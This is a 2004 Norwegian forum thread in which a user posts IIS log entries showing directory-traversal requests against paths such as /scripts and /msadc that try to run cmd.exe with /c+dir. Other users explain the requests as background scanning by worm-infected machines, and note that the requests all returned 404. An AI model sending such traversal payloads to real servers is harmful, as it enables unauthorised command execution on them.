DoffeY Skrevet 29. januar 2004 Del Skrevet 29. januar 2004 Titta igjennom loggen min for idag (IIS), og da kom jeg over dette: 2004-01-29 06:24:53 111.111.111.111 - 10.0.0.4 80 GET /scripts/root.exe /c+dir 404 - 2004-01-29 06:24:53 111.111.111.111 - 10.0.0.4 80 GET /MSADC/root.exe /c+dir 404 - 2004-01-29 06:24:53 111.111.111.111 - 10.0.0.4 80 GET /c/winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:24:54 111.111.111.111 - 10.0.0.4 80 GET /d/winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:24:54 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:15 111.111.111.111 - 10.0.0.4 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:15 111.111.111.111 - 10.0.0.4 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:15 111.111.111.111 - 10.0.0.4 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:15 111.111.111.111 - 10.0.0.4 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:17 111.111.111.111 - 10.0.0.4 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:17 111.111.111.111 - 10.0.0.4 80 GET /winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:17 111.111.111.111 - 10.0.0.4 80 GET /winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:18 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:18 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:18 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 - 2004-01-29 06:25:19 111.111.111.111 - 10.0.0.4 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 - - Sånn som det ser ut for meg, prøver denne karen og få kjørt cmd.exe, og prøver en rekke tilfeldige dir's hvor den "evt" kan ligge.. Kanskje i håp om og finne en eller annen webserver som feks deler C:\(root), og gir tilgang til og kjøre filer.. Er jeg helt på jordet da eller? Har foresten sensurert ipen hans.. Den kom fra .fr Lenke til kommentar
Torbjørn Skrevet 29. januar 2004 Del Skrevet 29. januar 2004 dette er bare for bakgrunnsstøy å regne. det er heller ingen kar, men en infisert maskin som står og gjør dette, i 98% av tilfellene. Lenke til kommentar
DoffeY Skrevet 29. januar 2004 Forfatter Del Skrevet 29. januar 2004 Ser ut som han har fått 404 "all the way" Lenke til kommentar
Lurifaksen Skrevet 29. januar 2004 Del Skrevet 29. januar 2004 Utrolig genialt å skrive et virus som bare prøver winnt mappen, og ikke windows mappen, som er standard på win2003, og alle desktop os. Er det winnt som er standard på 2000? Lenke til kommentar
ifi Skrevet 29. januar 2004 Del Skrevet 29. januar 2004 GeeZuZz Skrevet 29/01/2004 : 23:46Er det winnt som er standard på 2000? Det stemmer. $windir som variabelen heter, er \WINNT på Win2000, og \WINDOWS på 98 og xp (windows 2003 vet jeg ikke, men vil anta at det er \windows der også). Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå